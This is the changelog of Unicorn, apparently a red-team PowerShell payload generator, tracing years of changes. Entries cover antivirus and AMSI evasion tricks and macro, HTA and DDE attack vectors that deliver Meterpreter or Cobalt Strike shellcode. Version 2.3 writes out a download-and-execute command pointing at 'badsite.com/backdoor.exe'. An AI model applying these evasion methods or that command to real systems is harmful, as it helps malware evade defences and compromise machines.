CHANGELOG.txt

~~~~~~~~~~~~~~~~
version 3.17
~~~~~~~~~~~~~~~~

* change AMSI bytecode for better evasion for AMSI providers

~~~~~~~~~~~~~~~~
version 3.16
~~~~~~~~~~~~~~~~

* change AMSI bytecode to evade AMSI provider detection

~~~~~~~~~~~~~~~~
version 3.15
~~~~~~~~~~~~~~~~

* AMSI signature fix 
* added AMSI print decoded to payload output
* AMSI bypass signature bypass

~~~~~~~~~~~~~~~~
version 3.14
~~~~~~~~~~~~~~~~

* slimmed down payload to allow cmdline char restrictions
* AMSI signature bypass

~~~~~~~~~~~~~~~~
version 3.13
~~~~~~~~~~~~~~~~

* better evasion for Rasta's AMSI BYPASS
* better evasion for Unicorn payload

~~~~~~~~~~~~~~~~
version 3.12
~~~~~~~~~~~~~~~~

* fix an issue where if payload was generated, it would mess up the macro generation for AMSI_BYPASS if on
* fix an issue in Metasploit generation payload would throw a lock file error. Updating Metasploit fixes this issue and added a prompt.

~~~~~~~~~~~~~~~~
version 3.11
~~~~~~~~~~~~~~~~

* fix bug on amsi bypass 
* break av signature chain for payload
* add better error handling 
* break av signature for amsi bypass
* restructure amsi bypass code
* add automatic evasion for opcodes

~~~~~~~~~~~~~~~~
version 3.10
~~~~~~~~~~~~~~~~

* fix issue where meterpreter would not connect back as it was not specifying port properly
* remove error message on length size when using AMSI_BYPASS=ON
* add better evasion against amsi

~~~~~~~~~~~~~~~~
version 3.9
~~~~~~~~~~~~~~~~

* incorporate better disable AMSI from Rasta - already encoded to get around detection https://raw.githubusercontent.com/rasta-mouse/AmsiScanBufferBypass/master/ASBBypass.ps1
* add better evasion
* added bypass_amsi on by default it will now generate two stages for powershell commands, you can turn this off in the unicorn.py option AMSI_BYPASS="ON" to OFF

~~~~~~~~~~~~~~~~
version 3.8.8
~~~~~~~~~~~~~~~~ 

* remove double quotes which would cause compatibility issues on prior versions of Windows 10
* change around virtualprotect for evasion

~~~~~~~~~~~~~~~~
version 3.8.7
~~~~~~~~~~~~~~~~

* add () to bypass amsi

~~~~~~~~~~~~~~~~
version 3.8.6
~~~~~~~~~~~~~~~~

* fix escaping issue
* fix decode python3 error

~~~~~~~~~~~~~~~~
version 3.8.5
~~~~~~~~~~~~~~~~

* add integer number for evasion

~~~~~~~~~~~~~~~~
version 3.8.4
~~~~~~~~~~~~~~~~

* split up syswow64

~~~~~~~~~~~~~~~~
version 3.8.3
~~~~~~~~~~~~~~~~

* reduce payload size by removing temporary replaces
* add additional calloc/createthread changes to bypass signatures
* remove print statement for shellcode

~~~~~~~~~~~~~~~~
version 3.8.2
~~~~~~~~~~~~~~~~

* add dllimport function type to get around signatures

~~~~~~~~~~~~~~~~
version 3.8.1
~~~~~~~~~~~~~~~~

* changed 32/64 bit detection method to [environment]::Is64BitOperatingSystem -eq 'True'
* mangled true word to split it up
* fixed an error that would cause raw_input to error out on python 2 (not 3) when using AMSI_BYPASS to ON

~~~~~~~~~~~~~~~~
version 3.8
~~~~~~~~~~~~~~~~

* randomize noexit
* fix a python3 decode issue when generating meterpreter shellcode
* fix raw_input python 3 compatibility
* fix lambda error with python3 and decode format
* added a check for x64 bit shellcode and automatically downgrade payload for meterpreter

~~~~~~~~~~~~~~~~
version 3.7.6
~~~~~~~~~~~~~~~~

* randomize downgrade code for evasion

~~~~~~~~~~~~~~~~
3.7.5
~~~~~~~~~~~~~~~~

* randomize IEX command

~~~~~~~~~~~~~~~~
version 3.7.4
~~~~~~~~~~~~~~~~

* add randomization on byte replacing

~~~~~~~~~~~~~~~~
version 3.7.3
~~~~~~~~~~~~~~~~

* remove stage encoding and configure meterpreter listener options for better evasion

~~~~~~~~~~~~~~~~
version 3.7.2
~~~~~~~~~~~~~~~~

* fix macro injection escaping
* when using smallest payload, it gets flagged - removing smallest option flag for meterpreter since we don't need it anymore due to code optimization

~~~~~~~~~~~~~~~~
version 3.7.1
~~~~~~~~~~~~~~~~

* add Windows 7 support for Unicorn payload

~~~~~~~~~~~~~~~~
version 3.7
~~~~~~~~~~~~~~~~

* remove variable name as random string insertion for av avoidance
* add encoding and automatic stage loading in meterpreter (will flag AV) - looks to be time-gated, just load stdapi once meterpreter loaded
* added better evasion around sv and gv

~~~~~~~~~~~~~~~~
version 3.6.11
~~~~~~~~~~~~~~~~

* more evasion on add-type

~~~~~~~~~~~~~~~~
version 3.6.10
~~~~~~~~~~~~~~~~

* shorten up payload and av evasion

~~~~~~~~~~~~~~~~
version 3.6.9
~~~~~~~~~~~~~~~~

* move -pass to a different location

~~~~~~~~~~~~~~~~
3.6.8
~~~~~~~~~~~~~~~~

* mangle more CreateThread upon execution

~~~~~~~~~~~~~~~~
version 3.6.7
~~~~~~~~~~~~~~~~

* mangle word for WIn32Functions

~~~~~~~~~~~~~~~~
version 3.6.6
~~~~~~~~~~~~~~~~

* added mangle word for DllImport also shortened codebase

~~~~~~~~~~~~~~~~
version 3.6.5
~~~~~~~~~~~~~~~~

* added mangle word for CreateThread

~~~~~~~~~~~~~~~~
version 3.6.4
~~~~~~~~~~~~~~~~

* removed line continuation error when using macro injection

~~~~~~~~~~~~~~~~
version 3.6.3
~~~~~~~~~~~~~~~~

* converted from VirtualAlloc to calloc and some additional changes

~~~~~~~~~~~~~~~~
version 3.6.2
~~~~~~~~~~~~~~~~

* mangled VirtualAlloc for new signature updates

~~~~~~~~~~~~~~~~
version 3.6.1
~~~~~~~~~~~~~~~~

* broke out function for parsing -f c in msfvenom so it can be used in other locations
* shrunk payload size while enabling shikata_ga_nai for shellcode generation with unicorn by randomized special characters - shrinks payload drastically
* added better handling for custom shellcode for metasploit
* added ability to use custom shellcode to the custom shellcode generation for hta and macro - python unicorn.py <path_to_shellcode.txt> shellcode hta / macro / etc.

~~~~~~~~~~~~~~~~
version 3.6
~~~~~~~~~~~~~~~~

* turn AMSI bypass to OFF by default, not needed unless you want to disable/patch in memory
* removed liquify_bytes function for more preferred and smaller method which does replacement methods to circumvent AMSI signature providers

~~~~~~~~~~~~~~~~
version 3.5.3
~~~~~~~~~~~~~~~~

* added wording and help menu for amsi bypass
* added command line option for download/exec with macro

~~~~~~~~~~~~~~~~
version 3.5.2
~~~~~~~~~~~~~~~~

* fix a bug that would cause download/exec not to work when using macro

~~~~~~~~~~~~~~~~
version 3.5.1
~~~~~~~~~~~~~~~~

* more evasion *yawn*
* added amsi bypass to get around completely, adds amsi flag to command line. If you are using this then the 2191 cmd prompt limit will be larger
* added a PRINT_DECODED to unicorn.py, turn this to ON if you want to see the decoded command in its full extent

~~~~~~~~~~~~~~~~
version 3.5
~~~~~~~~~~~~~~~~

* add randomized URILength - YOLO Justin Elze
* removed sleep function for preferred -NoExit
* add more evasion

~~~~~~~~~~~~~~~~
version 3.4.5
~~~~~~~~~~~~~~~~

* move to while($true) instead of for loop
* fix byte splitting for match on regular expression
* slim down code (woot)
* add better handling of liquify bytes

~~~~~~~~~~~~~~~~
version 3.4.4
~~~~~~~~~~~~~~~~

* remove byte designation - not needed already in byte format

~~~~~~~~~~~~~~~~
version 3.4.3
~~~~~~~~~~~~~~~~

* fix when liquify bytes called would not reroll variable names which could cause conflicts

~~~~~~~~~~~~~~~~
version 3.4.2
~~~~~~~~~~~~~~~~

* remove -e''c as this breaks windows 7 compatibility, now works on win7

~~~~~~~~~~~~~~~~
version 3.4.1
~~~~~~~~~~~~~~~~

* remove byte specification, not needed and shortens code base
* fix cobalt strike hta and macro generation wording

~~~~~~~~~~~~~~~~
version 3.4
~~~~~~~~~~~~~~~~

* fix opening payload with file error by using open instead (thanks jmhickman for PR)
* fix macro injection technique that was not spawning a child process window which would cause powershell to fail
* fix 32 bit compatibility
* add better randomization variable name check conflicts (.lower())
* fix hta attack vector
* add a payload check for custom shellcode and cobalt strike to ensure its formatted properly

~~~~~~~~~~~~~~~~
version 3.3.2
~~~~~~~~~~~~~~~~

* add double () for defender signature update

~~~~~~~~~~~~~~~~
version 3.3.1
~~~~~~~~~~~~~~~~

* fix bugs where vars would be overwritten
* readd exception handling

~~~~~~~~~~~~~~~~
version 3.3
~~~~~~~~~~~~~~~~

* added back 32 bit compatibility
* added better evasion through kernel32.dll
* shaved shellcode size
* move back to IntPtr, system.int32 no longer needed
* add a variable check to ensure theres no variable name conflicts when using the powershell code

~~~~~~~~~~~~~~~~
version 3.2.10
~~~~~~~~~~~~~~~~

* use System.Int32 instead of int

~~~~~~~~~~~~~~~~
version 3.2.9
~~~~~~~~~~~~~~~~

* bugfix causing powershell to terminate

~~~~~~~~~~~~~~~~
version 3.2.8
~~~~~~~~~~~~~~~~

* change intptr to int

~~~~~~~~~~~~~~~~
version 3.2.7
~~~~~~~~~~~~~~~~

* randomize service name (lol)

~~~~~~~~~~~~~~~~
version 3.2.6
~~~~~~~~~~~~~~~~

* added more byte splitting for better evasion
* rewrote components for macro injection to circumvent av
* rewrote components for HTA injection to circumvent av

~~~~~~~~~~~~~~~~
version 3.2.5
~~~~~~~~~~~~~~~~

* add byte splitting based on defender sigs

~~~~~~~~~~~~~~~~
version 3.2.4
~~~~~~~~~~~~~~~~

* added randomized integer lengths for dynamic byte ranges

~~~~~~~~~~~~~~~~
version 3.2.3
~~~~~~~~~~~~~~~~

* create longer byte arrays for defender rule bypass

~~~~~~~~~~~~~~~~
version 3.2.2
~~~~~~~~~~~~~~~~

* add python 3 compatibility
* remove filewrite variable and move to function write_file for SettingContent-ms

~~~~~~~~~~~~~~~~
version 3.2.1
~~~~~~~~~~~~~~~~

* update blog post and update readme
* update unicorn metasploit meterpreter payload to remove a CLD from beginning of shellcode which was being snagged by defender

~~~~~~~~~~~~~~~~
version 3.2
~~~~~~~~~~~~~~~~

* added new SettingContent-ms from enigma0x3 to Unicorn supports cobalt strike, metasploit, and custom shellcode
* remove %windir%, getting flagged by AV

~~~~~~~~~~~~~~~~
version 3.1
~~~~~~~~~~~~~~~~

* added secondary parse for older versions of cobalt strike
* added better error handling around list index out of range
* modified lower stack size due to powershell crashing sometimes, seems to be more stable now

~~~~~~~~~~~~~~~~
version 3.0
~~~~~~~~~~~~~~~~

* added ability to import cobalt strike C# stager and use that as a unicorn based attack
* added ability to import any shellcode directly into unicorn
* remove cmd.exe depend on WSCRIPT.Shell - not needed and increases cmd line length limit
* added ability to use custom shellcode with cobalt strike and shellcode methods for hta
* added ability to use custom shellcode with cobalt strike and shellcode methods for macro
* fixed line continuation error for long payloads when using excel (can't have long strings with & plus 25)
* add hiding of powershell name in hta file

~~~~~~~~~~~~~~~~
version 2.14
~~~~~~~~~~~~~~~~

* fix replace for /C that broke syntax for macros

~~~~~~~~~~~~~~~~
version 2.13
~~~~~~~~~~~~~~~~

* added switches on command lines for evasion

~~~~~~~~~~~~~~~~
version 2.12
~~~~~~~~~~~~~~~~

* added better handling for stack size detection on signatures - should no longer get flagged

~~~~~~~~~~~~~~~~
version 2.11
~~~~~~~~~~~~~~~~

* reduce filesize by removing shikata from encoding on payload generation
* add lenght limit size description on error on size

~~~~~~~~~~~~~~~~
version 2.10
~~~~~~~~~~~~~~~~

* added IEX and formula evasion as DDE methods and split out attack vector into 3 different components
* rewrote the download/exec payload so that it is custom shellcode that is manually patched with URL instead of metasploit one
* numerous other enhancements and fixes

~~~~~~~~~~~~~~~~
version 2.9.3
~~~~~~~~~~~~~~~~

* add better obfsucation on dde

~~~~~~~~~~~~~~~~
version 2.9.2
~~~~~~~~~~~~~~~~

* fix compatibility with windows 7 - for some reason -e''c in Windows 7 breaks Unicorn whereas works fine within Windows 10

~~~~~~~~~~~~~~~~
version 2.9.1
~~~~~~~~~~~~~~~~

* fix typo in powershell_command
* added better obfsucation of path and code (thanks Will)

~~~~~~~~~~~~~~~~
version 2.9
~~~~~~~~~~~~~~~~

* added a sys.exit() on length amount
* added new dde code exec through unicorn from sensepost
* fixed some wording in help menu
* general code cleanup
* slimmed down command line some more with seperator reduction and variable name size length

~~~~~~~~~~~~~~~~
version 2.8.2
~~~~~~~~~~~~~~~~

* added better handling of randomized variable names
* removed an extra semicolon
* fixed typo
* added count length for payload to ensure payload doesn't increase past max command line length of 8191
* fixed minor casing on Start-Sleep

~~~~~~~~~~~~~~~~
version 2.8.1
~~~~~~~~~~~~~~~~

* remove static variables - flagged by A/V

~~~~~~~~~~~~~~~~
version 2.8
~~~~~~~~~~~~~~~~

* shortens length and obfuscation of unicorn command
* removed direct -ec from powershell command

~~~~~~~~~~~~~~~~
version 2.7.5
~~~~~~~~~~~~~~~~

* fix missing powershell call (thanks matterpreter)
* improved additional wording on error message for macros

~~~~~~~~~~~~~~~~
version 2.7.4
~~~~~~~~~~~~~~~~

* add a more real corrupt message from excel macro injection

~~~~~~~~~~~~~~~~
version 2.7.3
~~~~~~~~~~~~~~~~

* fixed powershell injection obfuscation in macro injection - that was a pain :P
* added bolt red to macro AutoOpen/Auto_Open difference based on version number
* fixed powershell injection length issues by skimming down the chunking of powershell commands

~~~~~~~~~~~~~~~~
verison 2.7.2
~~~~~~~~~~~~~~~~

* random cleanup

~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~

* fixed merge issue

~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~

* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names

~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~

* fixed an issue when generating hta if a folder was there it would not remove properly and overwrite
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability

~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~

* minor string format cleanup
* pep8 formatting

~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~

* complete rehaul on macro injection - adds heavy obfsucation through the entire codebase
* changed generate_random_strings to remove any digits - this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code

~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~

* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect

~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~

* added shortened version of -window hidden to -w 1 which is shorthand for window hidden

~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~

* added shortened method for obfsucation

~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~

* added better handling if msf or shellcode didn't get formatted properly
* added a new technique for obfsucation that should not get picked up anymore and removes the need for -e or -ec

~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~

* added better evasion on encodedcommand

~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~

* added decoded base64 -encodedcommand for better av evasion

~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~

* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.

~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~

* change auto_open to autopen() - thanks @JAshton

~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~

* fix indent issue

~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~

* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)

~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~

* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) - AV picking up on variables and base64 encoded strings

~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~

* added enablestageencoding to true by default

~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~

* added --smallest flag to msfvenom generate which compacts shellcode to smaller size

~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~

* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros

~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~

* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script

~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~

* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down payload. This is due to char restriction sizes when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length 
* added support for shikata ga nai to obfuscate shellcode prior to utf and b64encoding. Will now through off sigs if contained inside of a file.

~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~

* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes

~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~

* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable 
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload

~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~

* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection

~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~

* fixed hidden window command when using powershell injection

~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~

* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results. 
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement

~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~

* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode

~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~

* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process

~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~

* initial release of magic unicorn